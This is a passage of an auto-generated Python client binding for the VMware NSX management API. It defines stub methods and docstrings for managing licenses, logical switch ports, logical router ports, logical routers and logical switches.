:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'license': license,
})
def delete(self,
license_key,
):
"""
Deprecated. Use POST /licenses?action=delete API instead.
:type license_key: :class:`str`
:param license_key: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'license_key': license_key,
})
def delete_0(self,
license,
):
"""
This will delete the license key identified in the request body by
\"license_key\" and its properties from the system. Attempting to
delete the last license key will result in an error.
:type license: :class:`com.vmware.nsx.model_client.License`
:param license: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete_0',
{
'license': license,
})
def get(self):
"""
Deprecated. Use the GET /licenses API instead.
:rtype: :class:`com.vmware.nsx.model_client.License`
:return: com.vmware.nsx.model.License
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get', None)
def getlicensebykey(self,
license_key,
):
"""
Deprecated. Use GET /licenses API instead.
:type license_key: :class:`str`
:param license_key: (required)
:rtype: :class:`com.vmware.nsx.model_client.License`
:return: com.vmware.nsx.model.License
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('getlicensebykey',
{
'license_key': license_key,
})
def list(self):
"""
Returns all licenses.
:rtype: :class:`com.vmware.nsx.model_client.LicensesListResult`
:return: com.vmware.nsx.model.LicensesListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list', None)
def update(self,
license,
):
"""
Deprecated. Use the POST /licenses API instead
:type license: :class:`com.vmware.nsx.model_client.License`
:param license: (required)
:rtype: :class:`com.vmware.nsx.model_client.License`
:return: com.vmware.nsx.model.License
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'license': license,
})
class LogicalPorts(VapiInterface):
"""
"""
LIST_ATTACHMENT_TYPE_VIF = "VIF"
"""
Possible value for ``attachmentType`` of method :func:`LogicalPorts.list`.
"""
LIST_ATTACHMENT_TYPE_LOGICALROUTER = "LOGICALROUTER"
"""
Possible value for ``attachmentType`` of method :func:`LogicalPorts.list`.
"""
LIST_ATTACHMENT_TYPE_BRIDGEENDPOINT = "BRIDGEENDPOINT"
"""
Possible value for ``attachmentType`` of method :func:`LogicalPorts.list`.
"""
LIST_ATTACHMENT_TYPE_DHCP_SERVICE = "DHCP_SERVICE"
"""
Possible value for ``attachmentType`` of method :func:`LogicalPorts.list`.
"""
LIST_ATTACHMENT_TYPE_METADATA_PROXY = "METADATA_PROXY"
"""
Possible value for ``attachmentType`` of method :func:`LogicalPorts.list`.
"""
LIST_ATTACHMENT_TYPE_L2VPN_SESSION = "L2VPN_SESSION"
"""
Possible value for ``attachmentType`` of method :func:`LogicalPorts.list`.
"""
LIST_ATTACHMENT_TYPE_NONE = "NONE"
"""
Possible value for ``attachmentType`` of method :func:`LogicalPorts.list`.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.logical_ports'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _LogicalPortsStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
logical_port,
):
"""
Creates a new logical switch port. The required parameters are the
associated logical_switch_id and admin_state (UP or DOWN). Optional
parameters are the attachment and switching_profile_ids. If you don't
specify switching_profile_ids, default switching profiles are assigned
to the port. If you don't specify an attachment, the switch port
remains empty. To configure an attachment, you must specify an id, and
optionally you can specify an attachment_type (VIF or LOGICALROUTER).
The attachment_type is VIF by default.
:type logical_port: :class:`com.vmware.nsx.model_client.LogicalPort`
:param logical_port: (required)
:rtype: :class:`com.vmware.nsx.model_client.LogicalPort`
:return: com.vmware.nsx.model.LogicalPort
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'logical_port': logical_port,
})
def delete(self,
lport_id,
detach=None,
):
"""
Deletes the specified logical switch port. By default, if logical port
has attachments, or it is added to any NSGroup, the deletion will be
failed. Option detach could be used for deleting logical port forcibly.
:type lport_id: :class:`str`
:param lport_id: (required)
:type detach: :class:`bool` or ``None``
:param detach: force delete even if attached or referenced by a group (optional,
default to false)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'lport_id': lport_id,
'detach': detach,
})
def get(self,
lport_id,
):
"""
Returns information about a specified logical port.
:type lport_id: :class:`str`
:param lport_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.LogicalPort`
:return: com.vmware.nsx.model.LogicalPort
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'lport_id': lport_id,
})
def list(self,
attachment_id=None,
attachment_type=None,
bridge_cluster_id=None,
container_ports_only=None,
cursor=None,
diagnostic=None,
included_fields=None,
logical_switch_id=None,
page_size=None,
parent_vif_id=None,
sort_ascending=None,
sort_by=None,
switching_profile_id=None,
transport_node_id=None,
transport_zone_id=None,
):
"""
Returns information about all configured logical switch ports. Logical
switch ports connect to VM virtual network interface cards (NICs). Each
logical port is associated with one logical switch.
:type attachment_id: :class:`str` or ``None``
:param attachment_id: Logical Port attachment Id (optional)
:type attachment_type: :class:`str` or ``None``
:param attachment_type: Type of attachment for logical port; for query only. (optional)
:type bridge_cluster_id: :class:`str` or ``None``
:param bridge_cluster_id: Bridge Cluster identifier (optional)
:type container_ports_only: :class:`bool` or ``None``
:param container_ports_only: Only container VIF logical ports will be returned if true
(optional, default to false)
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type diagnostic: :class:`bool` or ``None``
:param diagnostic: Flag to enable showing of transit logical port. (optional, default
to false)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type logical_switch_id: :class:`str` or ``None``
:param logical_switch_id: Logical Switch identifier (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type parent_vif_id: :class:`str` or ``None``
:param parent_vif_id: ID of the VIF of type PARENT (optional)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:type switching_profile_id: :class:`str` or ``None``
:param switching_profile_id: Network Profile identifier (optional)
:type transport_node_id: :class:`str` or ``None``
:param transport_node_id: Transport node identifier (optional)
:type transport_zone_id: :class:`str` or ``None``
:param transport_zone_id: Transport zone identifier (optional)
:rtype: :class:`com.vmware.nsx.model_client.LogicalPortListResult`
:return: com.vmware.nsx.model.LogicalPortListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'attachment_id': attachment_id,
'attachment_type': attachment_type,
'bridge_cluster_id': bridge_cluster_id,
'container_ports_only': container_ports_only,
'cursor': cursor,
'diagnostic': diagnostic,
'included_fields': included_fields,
'logical_switch_id': logical_switch_id,
'page_size': page_size,
'parent_vif_id': parent_vif_id,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
'switching_profile_id': switching_profile_id,
'transport_node_id': transport_node_id,
'transport_zone_id': transport_zone_id,
})
def update(self,
lport_id,
logical_port,
):
"""
Modifies an existing logical switch port. Parameters that can be
modified include attachment_type (LOGICALROUTER, VIF), admin_state (UP
or DOWN), attachment id and switching_profile_ids. You cannot modify
the logical_switch_id. In other words, you cannot move an existing port
from one switch to another switch.
:type lport_id: :class:`str`
:param lport_id: (required)
:type logical_port: :class:`com.vmware.nsx.model_client.LogicalPort`
:param logical_port: (required)
:rtype: :class:`com.vmware.nsx.model_client.LogicalPort`
:return: com.vmware.nsx.model.LogicalPort
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'lport_id': lport_id,
'logical_port': logical_port,
})
class LogicalRouterPorts(VapiInterface):
"""
"""
LIST_RESOURCE_TYPE_LOGICALROUTERUPLINKPORT = "LogicalRouterUpLinkPort"
"""
Possible value for ``resourceType`` of method :func:`LogicalRouterPorts.list`.
"""
LIST_RESOURCE_TYPE_LOGICALROUTERDOWNLINKPORT = "LogicalRouterDownLinkPort"
"""
Possible value for ``resourceType`` of method :func:`LogicalRouterPorts.list`.
"""
LIST_RESOURCE_TYPE_LOGICALROUTERLINKPORTONTIER0 = "LogicalRouterLinkPortOnTIER0"
"""
Possible value for ``resourceType`` of method :func:`LogicalRouterPorts.list`.
"""
LIST_RESOURCE_TYPE_LOGICALROUTERLINKPORTONTIER1 = "LogicalRouterLinkPortOnTIER1"
"""
Possible value for ``resourceType`` of method :func:`LogicalRouterPorts.list`.
"""
LIST_RESOURCE_TYPE_LOGICALROUTERLOOPBACKPORT = "LogicalRouterLoopbackPort"
"""
Possible value for ``resourceType`` of method :func:`LogicalRouterPorts.list`.
"""
LIST_RESOURCE_TYPE_LOGICALROUTERIPTUNNELPORT = "LogicalRouterIPTunnelPort"
"""
Possible value for ``resourceType`` of method :func:`LogicalRouterPorts.list`.
"""
LIST_RESOURCE_TYPE_LOGICALROUTERCENTRALIZEDSERVICEPORT = "LogicalRouterCentralizedServicePort"
"""
Possible value for ``resourceType`` of method :func:`LogicalRouterPorts.list`.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.logical_router_ports'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _LogicalRouterPortsStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
logical_router_port,
):
"""
Creates a logical router port. The required parameters include
resource_type (LogicalRouterUpLinkPort, LogicalRouterDownLinkPort,
LogicalRouterLinkPort, LogicalRouterLoopbackPort,
LogicalRouterCentralizedServicePort); and logical_router_id (the router
to which each logical router port is assigned). The service_bindings
parameter is optional.
:type logical_router_port: :class:`vmware.vapi.struct.VapiStruct`
:param logical_router_port: (required)
The parameter must contain all the attributes defined in
:class:`com.vmware.nsx.model_client.LogicalRouterPort`.
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.LogicalRouterPort
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.LogicalRouterPort`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'logical_router_port': logical_router_port,
})
def delete(self,
logical_router_port_id,
cascade_delete_linked_ports=None,
force=None,
):
"""
Deletes the specified logical router port. You must delete logical
router ports before you can delete the associated logical router. To
Delete Tier0 router link port you must have to delete attached tier1
router link port, otherwise pass \"force=true\" as query param to force
delete the Tier0 router link port.
:type logical_router_port_id: :class:`str`
:param logical_router_port_id: (required)
:type cascade_delete_linked_ports: :class:`bool` or ``None``
:param cascade_delete_linked_ports: Flag to specify whether to delete related logical switch ports
(optional, default to false)
:type force: :class:`bool` or ``None``
:param force: Force delete the resource even if it is being used somewhere
(optional, default to false)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'logical_router_port_id': logical_router_port_id,
'cascade_delete_linked_ports': cascade_delete_linked_ports,
'force': force,
})
def get(self,
logical_router_port_id,
):
"""
Returns information about the specified logical router port.
:type logical_router_port_id: :class:`str`
:param logical_router_port_id: (required)
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.LogicalRouterPort
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.LogicalRouterPort`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'logical_router_port_id': logical_router_port_id,
})
def list(self,
cursor=None,
included_fields=None,
logical_router_id=None,
logical_switch_id=None,
page_size=None,
resource_type=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about all logical router ports. Information
includes the resource_type (LogicalRouterUpLinkPort,
LogicalRouterDownLinkPort, LogicalRouterLinkPort,
LogicalRouterLoopbackPort, LogicalRouterCentralizedServicePort);
logical_router_id (the router to which each logical router port is
assigned); and any service_bindings (such as DHCP relay service). The
GET request can include a query parameter (logical_router_id or
logical_switch_id).
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type logical_router_id: :class:`str` or ``None``
:param logical_router_id: Logical Router identifier (optional)
:type logical_switch_id: :class:`str` or ``None``
:param logical_switch_id: Logical Switch identifier (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type resource_type: :class:`str` or ``None``
:param resource_type: Resource types of logical router port (optional)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.LogicalRouterPortListResult`
:return: com.vmware.nsx.model.LogicalRouterPortListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'included_fields': included_fields,
'logical_router_id': logical_router_id,
'logical_switch_id': logical_switch_id,
'page_size': page_size,
'resource_type': resource_type,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def update(self,
logical_router_port_id,
logical_router_port,
):
"""
Modifies the specified logical router port. Required parameters include
the resource_type and logical_router_id. Modifiable parameters include
the resource_type (LogicalRouterUpLinkPort, LogicalRouterDownLinkPort,
LogicalRouterLinkPort, LogicalRouterLoopbackPort,
LogicalRouterCentralizedServicePort), logical_router_id (to reassign
the port to a different router), and service_bindings.
:type logical_router_port_id: :class:`str`
:param logical_router_port_id: (required)
:type logical_router_port: :class:`vmware.vapi.struct.VapiStruct`
:param logical_router_port: (required)
The parameter must contain all the attributes defined in
:class:`com.vmware.nsx.model_client.LogicalRouterPort`.
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.LogicalRouterPort
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.LogicalRouterPort`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'logical_router_port_id': logical_router_port_id,
'logical_router_port': logical_router_port,
})
class LogicalRouters(VapiInterface):
"""
"""
LIST_ROUTER_TYPE_TIER0 = "TIER0"
"""
Possible value for ``routerType`` of method :func:`LogicalRouters.list`.
"""
LIST_ROUTER_TYPE_TIER1 = "TIER1"
"""
Possible value for ``routerType`` of method :func:`LogicalRouters.list`.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.logical_routers'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _LogicalRoutersStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
logical_router,
):
"""
Creates a logical router. The required parameters are router_type
(TIER0 or TIER1) and edge_cluster_id (TIER0 only). Optional parameters
include internal and external transit network addresses.
:type logical_router: :class:`com.vmware.nsx.model_client.LogicalRouter`
:param logical_router: (required)
:rtype: :class:`com.vmware.nsx.model_client.LogicalRouter`
:return: com.vmware.nsx.model.LogicalRouter
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'logical_router': logical_router,
})
def delete(self,
logical_router_id,
cascade_delete_linked_ports=None,
force=None,
):
"""
Deletes the specified logical router. You must delete associated
logical router ports before you can delete a logical router. Otherwise
use force delete which will delete all related ports and other entities
associated with that LR. To force delete logical router pass force=true
in query param.
:type logical_router_id: :class:`str`
:param logical_router_id: (required)
:type cascade_delete_linked_ports: :class:`bool` or ``None``
:param cascade_delete_linked_ports: Flag to specify whether to delete related logical switch ports
(optional, default to false)
:type force: :class:`bool` or ``None``
:param force: Force delete the resource even if it is being used somewhere
(optional, default to false)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'logical_router_id': logical_router_id,
'cascade_delete_linked_ports': cascade_delete_linked_ports,
'force': force,
})
def get(self,
logical_router_id,
):
"""
Returns information about the specified logical router.
:type logical_router_id: :class:`str`
:param logical_router_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.LogicalRouter`
:return: com.vmware.nsx.model.LogicalRouter
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'logical_router_id': logical_router_id,
})
def list(self,
cursor=None,
included_fields=None,
page_size=None,
router_type=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about all logical routers, including the UUID,
internal and external transit network addresses, and the router type
(TIER0 or TIER1). You can get information for only TIER0 routers or
only the TIER1 routers by including the router_type query parameter.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type router_type: :class:`str` or ``None``
:param router_type: Type of Logical Router (optional)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.LogicalRouterListResult`
:return: com.vmware.nsx.model.LogicalRouterListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'router_type': router_type,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def reallocate(self,
logical_router_id,
service_router_allocation_config,
):
"""
API to re allocate edge node placement for TIER1 logical router. You
can re-allocate service routers of TIER1 in same edge cluster or
different edge cluster. You can also place edge nodes manually and
provide maximum two indices for HA mode ACTIVE_STANDBY. To re-allocate
on new edge cluster you must have existing edge cluster for TIER1
logical router. This will be disruptive operation and all existing
statistics of logical router will be remove.
:type logical_router_id: :class:`str`
:param logical_router_id: (required)
:type service_router_allocation_config: :class:`com.vmware.nsx.model_client.ServiceRouterAllocationConfig`
:param service_router_allocation_config: (required)
:rtype: :class:`com.vmware.nsx.model_client.LogicalRouter`
:return: com.vmware.nsx.model.LogicalRouter
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('reallocate',
{
'logical_router_id': logical_router_id,
'service_router_allocation_config': service_router_allocation_config,
})
def reprocess(self,
logical_router_id,
):
"""
Reprocess logical router configuration and configuration of related
entities like logical router ports, static routing, etc. Any missing
Updates are published to controller.
:type logical_router_id: :class:`str`
:param logical_router_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('reprocess',
{
'logical_router_id': logical_router_id,
})
def update(self,
logical_router_id,
logical_router,
):
"""
Modifies the specified logical router. Modifiable attributes include
the internal_transit_network, external_transit_networks, and
edge_cluster_id (for TIER0 routers).
:type logical_router_id: :class:`str`
:param logical_router_id: (required)
:type logical_router: :class:`com.vmware.nsx.model_client.LogicalRouter`
:param logical_router: (required)
:rtype: :class:`com.vmware.nsx.model_client.LogicalRouter`
:return: com.vmware.nsx.model.LogicalRouter
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'logical_router_id': logical_router_id,
'logical_router': logical_router,
})
class LogicalSwitches(VapiInterface):
"""
"""
LIST_TRANSPORT_TYPE_OVERLAY = "OVERLAY"
"""
Possible value for ``transportType`` of method :func:`LogicalSwitches.list`.
"""
LIST_TRANSPORT_TYPE_VLAN = "VLAN"
"""
Possible value for ``transportType`` of method :func:`LogicalSwitches.list`.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.logical_switches'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _LogicalSwitchesStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
logical_switch,
):
"""
Creates a new logical switch. The request must include the
transport_zone_id, display_name, and admin_state (UP or DOWN). The
replication_mode (MTEP or SOURCE) is required for overlay logical
switches, but not for VLAN-based logical switches. A vlan needs to be
provided for VLAN-based logical switches
:type logical_switch: :class:`com.vmware.nsx.model_client.LogicalSwitch`
:param logical_switch: (required)
:rtype: :class:`com.vmware.nsx.model_client.LogicalSwitch`
:return: com.vmware.nsx.model.LogicalSwitch
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'logical_switch': logical_switch,
})
def delete(self,
lswitch_id,
cascade=None,
detach=None,
):
"""
Removes a logical switch from the associated overlay or VLAN transport
zone. By default, a logical switch cannot be deleted if there are
logical ports on the switch, or it is added to a NSGroup. Cascade
option can be used to delete all ports and the logical switch. Detach
option can be used to delete the logical switch forcibly.
:type lswitch_id: :class:`str`
:param lswitch_id: (required)
:type cascade: :class:`bool` or ``None``
